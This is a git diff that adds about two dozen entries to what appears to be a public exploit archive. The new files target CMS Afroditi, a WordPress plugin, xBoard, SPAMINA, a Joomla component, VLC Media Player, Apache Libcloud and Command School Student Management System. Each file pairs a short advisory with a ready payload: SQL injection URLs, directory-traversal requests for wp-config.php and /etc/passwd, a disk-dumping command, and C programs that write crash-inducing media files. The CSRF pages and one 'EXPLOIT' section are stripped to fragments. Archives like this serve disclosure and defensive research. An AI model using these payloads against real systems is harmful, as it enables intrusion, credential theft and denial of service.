diff --git a/files.csv b/files.csv index 88d373f7f..604adf355 100755 --- a/files.csv +++ b/files.csv @@ -35196,3 +35196,26 @@ id,file,description,date,author,platform,type,port 38932,platforms/multiple/dos/38932.txt,"Avast JetDb::IsExploited4x - Performs Unbounded Search on Input",2015-12-10,"Google Security Research",multiple,dos,0 38933,platforms/multiple/dos/38933.txt,"Avast Heap Overflow Unpacking MoleBox Archives",2015-12-10,"Google Security Research",multiple,dos,0 38934,platforms/windows/dos/38934.txt,"Avast Integer Overflow Verifying numFonts in TTC Header",2015-12-10,"Google Security Research",windows,dos,0 +38935,platforms/asp/webapps/38935.txt,"CMS Afroditi 'id' Parameter SQL Injection Vulnerablity",2013-12-30,"projectzero labs",asp,webapps,0 +38936,platforms/php/webapps/38936.txt,"Advanced Dewplayer Plugin for WordPress 'download-file.php' Script Directory Traversal Vulnerability",2013-12-30,"Henri Salo",php,webapps,0 +38937,platforms/linux/local/38937.txt,"Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability",2014-01-01,anonymous,linux,local,0 +38938,platforms/php/webapps/38938.txt,"xBoard 'post' Parameter Local File Include Vulnerability",2013-12-24,"TUNISIAN CYBER",php,webapps,0 +38939,platforms/multiple/dos/38939.c,"VLC Media Player 1.1.11 '.NSV' File Denial of Service Vulnerability",2012-03-14,"Dan Fosco",multiple,dos,0 +38940,platforms/multiple/dos/38940.c,"VLC Media Player 1.1.11 '.EAC3' File Denial of Service Vulnerability",2012-03-14,"Dan Fosco",multiple,dos,0 +38942,platforms/php/webapps/38942.txt,"SPAMINA Cloud Email Firewall Directory Traversal Vulnerability",2013-10-03,"Sisco Barrera",php,webapps,0 +38943,platforms/php/webapps/38943.txt,"Joomla! Aclsfgpl Component 'index.php' Arbitrary File Upload Vulnerability",2014-01-07,"TUNISIAN CYBER",php,webapps,0 +38944,platforms/php/webapps/38944.txt,"Command School Student Management System /sw/admin_grades.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 +38945,platforms/php/webapps/38945.txt,"Command School Student Management System /sw/admin_terms.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 +38946,platforms/php/webapps/38946.txt,"Command School Student Management System /sw/admin_school_years.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 +38947,platforms/php/webapps/38947.txt,"Command School Student Management System /sw/admin_sgrades.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 +38948,platforms/php/webapps/38948.txt,"Command School Student Management System /sw/admin_media_codes_1.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 +38949,platforms/php/webapps/38949.txt,"Command School Student Management System /sw/admin_infraction_codes.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 +38950,platforms/php/webapps/38950.txt,"Command School Student Management System /sw/admin_generations.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 +38951,platforms/php/webapps/38951.txt,"Command School Student Management System /sw/admin_relations.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 +38952,platforms/php/webapps/38952.txt,"Command School Student Management System /sw/admin_titles.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 +38953,platforms/php/webapps/38953.txt,"Command School Student Management System /sw/health_allergies.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 +38954,platforms/php/webapps/38954.txt,"Command School Student Management System /sw/admin_school_names.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 +38955,platforms/php/webapps/38955.txt,"Command School Student Management System /sw/admin_subjects.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 +38956,platforms/php/webapps/38956.txt,"Command School Student Management System /sw/backup/backup_ray2.php Database Backup Direct Request Information Disclosure",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 +38957,platforms/php/webapps/38957.html,"Command School Student Management System /sw/admin_change_password.php Admin Password Manipulation CSRF",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 +38958,platforms/php/webapps/38958.html,"Command School Student Management System /sw/add_topic.php Topic Creation CSRF",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 diff --git a/platforms/asp/webapps/38935.txt b/platforms/asp/webapps/38935.txt new file mode 100755 index 000000000..d92504441 --- /dev/null +++ b/platforms/asp/webapps/38935.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/64572/info + +CMS Afroditi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +CMS Afroditi 1.0 is vulnerable. + +http://www.example.com/default.asp?id=25 and 0<=(SELECT count(*) FROM [site]) and 1=1 \ No newline at end of file diff --git a/platforms/linux/local/38937.txt b/platforms/linux/local/38937.txt new file mode 100755 index 000000000..90936f180 --- /dev/null +++ b/platforms/linux/local/38937.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/64617/info + +Apache Libcloud is prone to a local information-disclosure vulnerability. + +Local attackers can exploit this issue to obtain sensitive information. Information obtained may lead to further attacks. + +Apache Libcloud versions 0.12.3 through 0.13.2 are vulnerable. + +dd if=/dev/vda bs=1M | strings -n 100 > out.txt \ No newline at end of file diff --git a/platforms/multiple/dos/38939.c b/platforms/multiple/dos/38939.c new file mode 100755 index 000000000..aa096c25c --- /dev/null +++ b/platforms/multiple/dos/38939.c @@ -0,0 +1,38 @@ +source: http://www.securityfocus.com/bid/64623/info + +VLC Media Player is prone to a denial-of-service vulnerability. + +Successful exploits may allow attackers to crash the affected application, denying service to legitimate users. + +VLC Media Player 1.1.11 is vulnerable; other versions may also be affected. + +# Exploit Title: VLC v. 1.1.11 .nsv DOS +# Date: 3/14/2012 +# Author: Dan Fosco +# Vendor or Software Link: www.videolan.org +# Version: 1.1.11 +# Category: local +# Google dork: n/a +# Tested on: Windows XP SP3 (64-bit) +# Demo site: n/a + +#include + +int main() +{ + FILE *f; + f = fopen("dos.nsv", "w"); + fputs("\x4e\x53\x56\x66", f); + fputc('\x00', f); + fputc('\x00', f); + fputc('\x00', f); + fputc('\x00', f); + fclose(f); + return 0; +} + +//use code for creating malicious file + +edit: works on 2.0.1.0 + + diff --git a/platforms/multiple/dos/38940.c b/platforms/multiple/dos/38940.c new file mode 100755 index 000000000..0a424d905 --- /dev/null +++ b/platforms/multiple/dos/38940.c @@ -0,0 +1,33 @@ +source: http://www.securityfocus.com/bid/64626/info + +VLC Media Player is prone to a denial-of-service vulnerability. + +Successful exploits may allow attackers to crash the affected application, denying service to legitimate users. + +VLC Media Player 1.1.11 is vulnerable; other versions may also be affected. + +# Exploit Title: VLC v. 1.1.11 .eac3 DOS +# Date: 3/14/2012 +# Author: Dan Fosco +# Vendor or Software Link: www.videolan.org +# Version: 1.1.11 +# Category:: local +# Google dork: n/a +# Tested on: Windows XP SP3 (64-bit) +# Demo site: n/a + +#include + +int main(int argc, char *argv[]) +{ + FILE *f; + f = fopen(argv[1], "r+"); + fseek(f, 5, SEEK_SET); + fputc('\x00', f); + fclose(f); + return 0; +} + +//code updates eac3 file, can find samples on videolan ftp server + + diff --git a/platforms/php/webapps/38936.txt b/platforms/php/webapps/38936.txt new file mode 100755 index 000000000..9ac8c32b4 --- /dev/null +++ b/platforms/php/webapps/38936.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/64587/info + +The Advanced Dewplayer plugin for WordPress is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. + +Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks. + +Advanced Dewplayer 1.2 is vulnerable; other versions may also be affected. + +http://www.example.com/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php \ No newline at end of file diff --git a/platforms/php/webapps/38938.txt b/platforms/php/webapps/38938.txt new file mode 100755 index 000000000..e43f7cb01 --- /dev/null +++ b/platforms/php/webapps/38938.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/64619/info + +xBoard is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts. This could allow the attacker to compromise the application and the computer; other attacks are also possible. + +xBoard 5.0, 5.5, and 6.0 are vulnerable. + +http://www.example.com/xboard/view.php?post=[LFI] \ No newline at end of file diff --git a/platforms/php/webapps/38942.txt b/platforms/php/webapps/38942.txt new file mode 100755 index 000000000..99ab519da --- /dev/null +++ b/platforms/php/webapps/38942.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/64693/info + +SPAMINA Cloud Email Firewall is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input. + +A remote attacker could exploit the vulnerability using directory-traversal characters ('../') to access arbitrary files that contain sensitive information. Information harvested may aid in launching further attacks. + +SPAMINA Cloud Email Firewall 3.3.1.1 is vulnerable; other versions may also be affected. + +https://www.example.com/?action=showHome&language=../../../../../../../../../../etc/passwd%00.jpg +https://www.example.com/multiadmin/js/lib/?action=../../../../../../../../../../etc/passwd&language=de +https://www.example.com/index.php?action=userLogin&language=../../../../../../../../../../etc/passwd.jpg \ No newline at end of file diff --git a/platforms/php/webapps/38943.txt b/platforms/php/webapps/38943.txt new file mode 100755 index 000000000..3bba12872 --- /dev/null +++ b/platforms/php/webapps/38943.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/64705/info + +The Aclsfgpl component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. + +An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. + +http://www.example.com/index.php?option=com_aclsfgpl&Itemid=[num]&ct=servs1&md=add_form \ No newline at end of file diff --git a/platforms/php/webapps/38944.txt b/platforms/php/webapps/38944.txt new file mode 100755 index 000000000..2914f5af0 --- /dev/null +++ b/platforms/php/webapps/38944.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/64707/info + +Command School Student Management System is prone to the following security vulnerabilities: + +1. Multiple SQL-injection vulnerabilities +2. A cross-site request forgery vulnerability +3. A cross-site scripting vulnerability +4. An HTML injection vulnerability +5. A security-bypass vulnerability + +Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions. + +Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. + +http://www.example.com/sw/admin_grades.php?action=edit&id=null+and+1=2+union+select+version() \ No newline at end of file diff --git a/platforms/php/webapps/38945.txt b/platforms/php/webapps/38945.txt new file mode 100755 index 000000000..18e819303 --- /dev/null +++ b/platforms/php/webapps/38945.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/64707/info + +Command School Student Management System is prone to the following security vulnerabilities: + +1. Multiple SQL-injection vulnerabilities +2. A cross-site request forgery vulnerability +3. A cross-site scripting vulnerability +4. An HTML injection vulnerability +5. A security-bypass vulnerability + +Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions. + +Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. + +http://www.example.com/sw/admin_terms.php?action=edit&id=null+and+1=2+union+select+version() \ No newline at end of file diff --git a/platforms/php/webapps/38946.txt b/platforms/php/webapps/38946.txt new file mode 100755 index 000000000..e428a5c42 --- /dev/null +++ b/platforms/php/webapps/38946.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/64707/info + +Command School Student Management System is prone to the following security vulnerabilities: + +1. Multiple SQL-injection vulnerabilities +2. A cross-site request forgery vulnerability +3. A cross-site scripting vulnerability +4. An HTML injection vulnerability +5. A security-bypass vulnerability + +Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions. + +Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. + +http://www.example.com/sw/admin_school_years.php?action=edit&id=null+and+1=2+union+select+version() \ No newline at end of file diff --git a/platforms/php/webapps/38947.txt b/platforms/php/webapps/38947.txt new file mode 100755 index 000000000..ac9f1b04b --- /dev/null +++ b/platforms/php/webapps/38947.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/64707/info + +Command School Student Management System is prone to the following security vulnerabilities: + +1. Multiple SQL-injection vulnerabilities +2. A cross-site request forgery vulnerability +3. A cross-site scripting vulnerability +4. An HTML injection vulnerability +5. A security-bypass vulnerability + +Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions. + +Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. + +http://www.example.com/sw/admin_sgrades.php?action=edit&id=null+and+1=2+union+select+version() \ No newline at end of file diff --git a/platforms/php/webapps/38948.txt b/platforms/php/webapps/38948.txt new file mode 100755 index 000000000..ea300d942 --- /dev/null +++ b/platforms/php/webapps/38948.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/64707/info + +Command School Student Management System is prone to the following security vulnerabilities: + +1. Multiple SQL-injection vulnerabilities +2. A cross-site request forgery vulnerability +3. A cross-site scripting vulnerability +4. An HTML injection vulnerability +5. A security-bypass vulnerability + +Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions. + +Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. + +http://www.example.com/sw/admin_media_codes_1.php?action=edit&id=null+and+1=2+union+select+version(),2,3 \ No newline at end of file diff --git a/platforms/php/webapps/38949.txt b/platforms/php/webapps/38949.txt new file mode 100755 index 000000000..f44044a3a --- /dev/null +++ b/platforms/php/webapps/38949.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/64707/info + +Command School Student Management System is prone to the following security vulnerabilities: + +1. Multiple SQL-injection vulnerabilities +2. A cross-site request forgery vulnerability +3. A cross-site scripting vulnerability +4. An HTML injection vulnerability +5. A security-bypass vulnerability + +Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions. + +Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. + +http://www.example.com/sw/admin_infraction_codes.php?action=edit&id=null+and+1=2+union+select+version() \ No newline at end of file diff --git a/platforms/php/webapps/38950.txt b/platforms/php/webapps/38950.txt new file mode 100755 index 000000000..c4cc7ab48 --- /dev/null +++ b/platforms/php/webapps/38950.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/64707/info + +Command School Student Management System is prone to the following security vulnerabilities: + +1. Multiple SQL-injection vulnerabilities +2. A cross-site request forgery vulnerability +3. A cross-site scripting vulnerability +4. An HTML injection vulnerability +5. A security-bypass vulnerability + +Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions. + +Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. + +http://www.example.com/sw/admin_generations.php?action=edit&id=null+and+1=2+union+select+version() \ No newline at end of file diff --git a/platforms/php/webapps/38951.txt b/platforms/php/webapps/38951.txt new file mode 100755 index 000000000..13fec906f --- /dev/null +++ b/platforms/php/webapps/38951.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/64707/info + +Command School Student Management System is prone to the following security vulnerabilities: + +1. Multiple SQL-injection vulnerabilities +2. A cross-site request forgery vulnerability +3. A cross-site scripting vulnerability +4. An HTML injection vulnerability +5. A security-bypass vulnerability + +Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions. + +Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. + +http://www.example.com/sw/admin_relations.php?action=edit&id=null+and+1=2+union+select+version() \ No newline at end of file diff --git a/platforms/php/webapps/38952.txt b/platforms/php/webapps/38952.txt new file mode 100755 index 000000000..f5d4ba450 --- /dev/null +++ b/platforms/php/webapps/38952.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/64707/info + +Command School Student Management System is prone to the following security vulnerabilities: + +1. Multiple SQL-injection vulnerabilities +2. A cross-site request forgery vulnerability +3. A cross-site scripting vulnerability +4. An HTML injection vulnerability +5. A security-bypass vulnerability + +Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions. + +Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. + +http://www.example.com/sw/admin_titles.php?action=edit&id=null+and+1=2+union+select+version() \ No newline at end of file diff --git a/platforms/php/webapps/38953.txt b/platforms/php/webapps/38953.txt new file mode 100755 index 000000000..cee1706d9 --- /dev/null +++ b/platforms/php/webapps/38953.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/64707/info + +Command School Student Management System is prone to the following security vulnerabilities: + +1. Multiple SQL-injection vulnerabilities +2. A cross-site request forgery vulnerability +3. A cross-site scripting vulnerability +4. An HTML injection vulnerability +5. A security-bypass vulnerability + +Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions. + +Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. + +http://www.example.com/sw/health_allergies.php?action=edit&id=null+and+1=2+union+select+version() \ No newline at end of file diff --git a/platforms/php/webapps/38954.txt b/platforms/php/webapps/38954.txt new file mode 100755 index 000000000..5ad8b02fe --- /dev/null +++ b/platforms/php/webapps/38954.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/64707/info + +Command School Student Management System is prone to the following security vulnerabilities: + +1. Multiple SQL-injection vulnerabilities +2. A cross-site request forgery vulnerability +3. A cross-site scripting vulnerability +4. An HTML injection vulnerability +5. A security-bypass vulnerability + +Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions. + +Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. + +http://www.example.com/sw/admin_school_names.php?action=edit&id=null+and+1=2+union+select+version() \ No newline at end of file diff --git a/platforms/php/webapps/38955.txt b/platforms/php/webapps/38955.txt new file mode 100755 index 000000000..9221e220e --- /dev/null +++ b/platforms/php/webapps/38955.txt @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/64707/info + +Command School Student Management System is prone to the following security vulnerabilities: + +1. Multiple SQL-injection vulnerabilities +2. A cross-site request forgery vulnerability +3. A cross-site scripting vulnerability +4. An HTML injection vulnerability +5. A security-bypass vulnerability + +Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions. + +Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. + +http://www.example.com/sw/admin_subjects.php?action=edit&id=null+and+1=2+union+select+version() \ No newline at end of file diff --git a/platforms/php/webapps/38956.txt b/platforms/php/webapps/38956.txt new file mode 100755 index 000000000..281c07123 --- /dev/null +++ b/platforms/php/webapps/38956.txt @@ -0,0 +1,82 @@ +source: http://www.securityfocus.com/bid/64707/info + +Command School Student Management System is prone to the following security vulnerabilities: + +1. Multiple SQL-injection vulnerabilities +2. A cross-site request forgery vulnerability +3. A cross-site scripting vulnerability +4. An HTML injection vulnerability +5. A security-bypass vulnerability + +Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions. + +Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. + + +############## +VULNERABILITY +############## + +/Backup/backup_ray2.php (LINE: 78-126) + +----------------------------------------------------------------------------- +// SET THE NAME OF THE BACKUP WITH A TIMESTAMP +$bkup = 'mysql' . date('Ymd\THis') . $db_name . '.txt'; +$fp = fopen($bkup, "w"); + + +// GET THE LIST OF TABLES +$sql = "SHOW TABLES"; +$res = mysql_query($sql); +if (!$res) die( mysql_error() ); +if (mysql_num_rows($res) == 0) die( "NO TABLES IN $db_name" ); +while ($s = mysql_fetch_array($res)) +{ + $tables[] = $s[0]; +} + + +// ITERATE OVER THE LIST OF TABLES +foreach ($tables as $table) +{ + +// WRITE THE DROP TABLE STATEMENT + fwrite($fp,"DROP TABLE `$table`;\n"); + +// GET THE CREATE TABLE STATEMENT + $res = mysql_query("SHOW CREATE TABLE `$table`"); + if (!$res) die( mysql_error() ); + $cre = mysql_fetch_array($res); + $cre[1] .= ";"; + $txt = str_replace("\n", "", $cre[1]); // FIT EACH QUERY ON ONE LINE + fwrite($fp, $txt . "\n"); + +// GET THE TABLE DATA + $data = mysql_query("SELECT * FROM `$table`"); + $num = mysql_num_fields($data); + while ($row = mysql_fetch_array($data)) + { + +// MAKE INSERT STATEMENTS FOR ALL THE VALUES + $txt = "INSERT INTO `$table` VALUES("; + for ($i=0; $i < $num; $i++) + { + $txt .= "'".mysql_real_escape_string($row[$i])."', "; + } + $txt = substr($txt, 0, -2); + fwrite($fp, $txt . ");\n"); + } +} +// ALL DONE +fclose($fp); +----------------------------------------------------------------------------- + +##################################################### +EXPLOIT +##################################################### + + +Iphobos Blog + + diff --git a/platforms/php/webapps/38957.html b/platforms/php/webapps/38957.html new file mode 100755 index 000000000..07fb71626 --- /dev/null +++ b/platforms/php/webapps/38957.html @@ -0,0 +1,25 @@ +source: http://www.securityfocus.com/bid/64707/info + +Command School Student Management System is prone to the following security vulnerabilities: + +1. Multiple SQL-injection vulnerabilities +2. A cross-site request forgery vulnerability +3. A cross-site scripting vulnerability +4. An HTML injection vulnerability +5. A security-bypass vulnerability + +Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions. + +Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. + +[Change Password Admin] + + + +
+ + +
+ + \ No newline at end of file diff --git a/platforms/php/webapps/38958.html b/platforms/php/webapps/38958.html new file mode 100755 index 000000000..562408329 --- /dev/null +++ b/platforms/php/webapps/38958.html @@ -0,0 +1,26 @@ +source: http://www.securityfocus.com/bid/64707/info + +Command School Student Management System is prone to the following security vulnerabilities: + +1. Multiple SQL-injection vulnerabilities +2. A cross-site request forgery vulnerability +3. A cross-site scripting vulnerability +4. An HTML injection vulnerability +5. A security-bypass vulnerability + +Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions. + +Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. + +[CSRF with XSS Exploit] + + + +
+ + + +
+ + \ No newline at end of file